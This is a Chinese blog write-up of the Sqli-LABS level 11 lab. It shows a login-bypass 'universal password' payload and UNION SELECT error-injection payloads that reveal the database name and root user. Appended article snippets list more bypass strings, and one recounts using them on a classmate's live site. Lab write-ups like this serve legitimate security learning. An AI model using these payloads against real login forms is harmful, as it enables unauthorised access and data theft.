mysql登录框万能密码_Sqli-LABS通关笔录-11[sql注入之万能密码以及登录框报错注入]...

最新推荐文章于 2024-09-01 14:22:01 发布
最新推荐文章于 2024-09-01 14:22:01 发布
阅读量753 收藏 1
点赞数 1
文章标签: mysql登录框万能密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35999626/article/details/113641332
版权

在这一关卡我学到了

1.万能密码的构造,大概的去揣测正常的SQL语句是如何的。

2.

3.

00x1SQL万能密码的构造

在登录框当中可以添加了一个单引号。报错信息如下所示:

4537503d943bb8c4d8ddb2c34d709bb6.png

据此报错,我们大概的可以猜测其网站的正常是SQL语句如下:

$sql="select username,password from 表明 where username='$username' and password='$password' limit 0,1"

即使如此,那么来尝试将其闭合。

账号密码同时尝试输入:admin' or '1'='1#

82b9e9f6848b64f305f74860621a0779.png

可见成功登陆。那么我们来分析一下原因吧。

当我们账号输入admin' or '1'='1的时候(密码随意填写),到SQL语句里的执行就是

$sql="select username,password from 表明 where username='test' or '1'='1'

最后的那个单引号是系统自动加上去的。所以我们不必画蛇添足。

至于密码部分全部被#消除了。完整的sql语句是:

$sql="select username,password from 表明 where username='admin' or '1'='1# and password='$password' limit 0,1"

如此一来,系统会自动加一个单引号。就变成了如下语句:

$sql="select username,password from 表明 where username='admin' or '1'='1'"

如此一来就成功绕过了登陆进入网站的后台。

64e0bcf9e85e71fa3b572e29fced89a2.png

00x2 登陆框报错注入

0x1猜字段数

order by 5的时候爆的时候出错了。提示“不知道这个第五条”

343484572de7a958e3f4b2767a9a3b13.png

直到2的时候页面跟刚才不一样了!

347b19ac2e9ed785f5f3cd36d6e6c495.png

说明字段书是2

00x2 猜数据库

Payload:123' union select database(),2#

bffa92e698789ad08879eb0fa11eeb4f.png

再尝试:123' union select concat(user(),0x2b,database(),0x2b),2#

5251d9beeb4a934d646a273e343ff9ca.png

Your Login name:root@localhost+security+

root权限,数据库名为security

直接使用联合查询注入.......

THE END

张献忠
关注
mysql登录万能密码_网站登录万能密码
weixin_36023533的博客
02-08 1408
---恢复内容开始---说实话如果一个网站的前台都是注入漏洞,那么凭经验,万能密码进后台的几率基本上是百分之百。可是有的人说对PHP的站如果是GPC魔术转换开启,就会对特殊符号转义,就彻底杜绝了PHP注入。其实说这话的人没有好好想过,更没有尝试过用万能密码进PHP的后台。其实GPC魔术转换是否开启对用万能密码进后台一点影响也没有。如果你用这样的万能密码‘or'='or’,当然进不去,理由是GPC开...
Sqli-LABS通关笔录-11[sql注入万能密码以及登录报错注入]
aiquan9342的博客
12-02 463
在这一关卡我学到了 1.万能密码的构造,大概的去揣测正常的SQL语句是如何的。 2. 3. 00x1SQL万能密码的构造 在登录当中可以添加了一个单引号。报错信息如下所示: 据此报错,我们大概的可以猜测其网站的正常是SQL语句如下: $sql="select username,password from 表明 where username='$u...
sql注入万能密码
05-19
sql注入万能密码 全部的万能代码 如"or "a"="a 等等很多
万能密码:‘or 1=1-- 实战SQL注入,秒破后台
热门推荐
杨明金的博客
10-24 3万+
主要是没有对登录密码的字符串进行参数化和过滤,所以导致网站可以直接用“万能密码”进行突破登录 仅供学习交流 这是某同学做的网站,今天无聊打开了,并帮他进行测试一下 看到这个后台,感觉做的还是不错的,首先SQL注入一般这种“万能密码”在99%的网站都是没有用的了,因为几乎所有发布到网络上的网站都是有进行安全考虑的,像这种学生的学术作品的话,一般不会考虑那么多,所以直接使用万能密码进行登录后台 万能密码:'or 1=1-- 用户名随便输入,密码填写这个,输入验证码,ok,大功告成 直接就.
记一次实战中sql注入——一个登录怎么测试?
最新发布
白帽黑客鹏哥的博客
09-01 1499
一个登录怎么测试?测试步骤:1、首先查找注入点:在登录页面的账户输入admin’密码随便输,返回如下图但是我输入admin’’ 密码随便,返回的又不一样所以我先去bp里面抓包试验一下用sleep()函数实验一下,看能不能触发这个sleep函数果然它睡了五秒所以更加确定这个地方是有注入点的那么接下来构造基本的轮子:Payload:在sleep()函数里面加一个if语句,就是说1=1那个表达式中,如果为真就返回5,否则就返回0这一次也是停了5秒才显示出来的继续构造poc。
HTB_Appointment 靶机之登录万能密码sqlmap post 注入
网络安全学习
04-22 4191
⚔ 🧱 YOU NEED TO WALK BEFORE YOU CAN RUN 🧱⚔ 文章目录先放答案万能密码注入sqlmap post 注入测试是否存在注入查数据库查表查列查数据 先放答案 因为这期问题都比较简单,简单到我想不到讲什么把它们串到一起,索性就直接放答案了 Structured Query Language SQL Injection personally identifiable information A03:2021-Injection Apache httpd 2.4.38 ((.
Mysql漏洞注入——万能密码
qq_66985187的博客
03-14 1163
万能密码mysql绕过验证和web渗透测试
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
sqli-labs-master.zip
03-17
SQL-labs是一个专为初学者设计的SQL注入练习靶场,帮助用户深入理解SQL注入的原理、手法以及防御策略。在这个靶场中,你可以通过实际操作,提升自己的Web安全技能和渗透测试能力。 SQL-labs靶场包含了丰富的练习...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
mysql万能密钥_攻防世界-web-Zhuanxv(任意文件读取、万能密钥、sql盲注 )
weixin_28785509的博客
01-21 522
题目来源:XCTF 4th-SCTF-2018题目描述:你只是在扫描目标端口的时候发现了一个开放的web服务进入场景后是一个显示时间的页面使用dirsearch扫描一下,发现隐藏目录list。命令:python3 dirsearch.py -u http://220.249.52.133:43210/ -e *访问list目录,发现是一个后台登录页面抓包发现背景图片是从后台加载的一张图片或者从网页...
PHP万能登陆密码
03-21
PHP万能登陆密码,涵盖了所有的万能类型,值得收藏
注入总结之万能密码
06-15
适用的网络安全学习资源,PHP+MySql,ASP+Access,ASP+Ms Sql
23-mysql万能用户名和万能密码
高调做事,低调做人!
04-06 1万+
1.万能密码 注入的时候写入   用户名  aa   密码  ‘bb’ or 1=1 2.万能用户名 注入的时候 用户名为(注意:不加sql中的分号): aa   union select * from user /* 密码:  随便
MySQL万能密码原理分析
yuan_boss的博客
08-23 397
可以自己先推测出sql语句,然后利用一些绕过方式与推测的sql语句进行结合尝试。结合之后,可以发现,始终成立,所以可以查出所有数据。尝试万能密码登录:**’ or 1=1 – **通过报错回显可以得知具有sql注入
登陆界面万能密码绕过
1stPeak's Blog
08-12 3553
常见万能密码: admin'-- admin' or ''=''-- admin' or 1=1-- 'or 1=1-- admin'or''=' 'or'='or' 'or''='
[sql注入]万能密码
qq_37301470的博客
11-13 347
uname=1&passwd=1 or 1=1--+ uname=1&passwd=1' or 1=1--+ uname=1&passwd=1" or 1=1--+ uname=1&passwd=1') or 1=1--+ uname=1&passwd=1") or 1=1--+ 作者:Hyafinthus 链接:https://www.jianshu.com/p/b9ceed993ad4 来源:简书 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出
mysql万能密码_sql注入问题 java中将MySQL的数据库验证秘密加上 ' or '1'= '1 就可以出现万能密码...
weixin_34621309的博客
01-19 1034
password的字符串中,加上 ' or '1'= '1 就可以制作出万能密码。原因如下:原代码中密码是123456执行数据库查询语句实际上执行的SQL语句是:select * from sw_user where username='swift' and password='123456'这是需要账号密码都正确才能登陆成功如果有人将密码设置成这样的密码,则成了万能密码,什么样的用户名和密码都会...
mysql忘记密码万能解决方法
qq_40894047的博客
06-02 250
一共分为一下几步: 1、停止服务;net stop mysql 2、编辑my.ini; 在mysqld里增加skip-grant-tables 3、重启服务; 4、连接mysqlmysql -uroot -p 回车 此时是不需要密码的 5、use mysql; 6、修改密码;update mysql.user set authentication_string=password('123456') where user='root' and Host = 'localhost'; 7、刷..
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值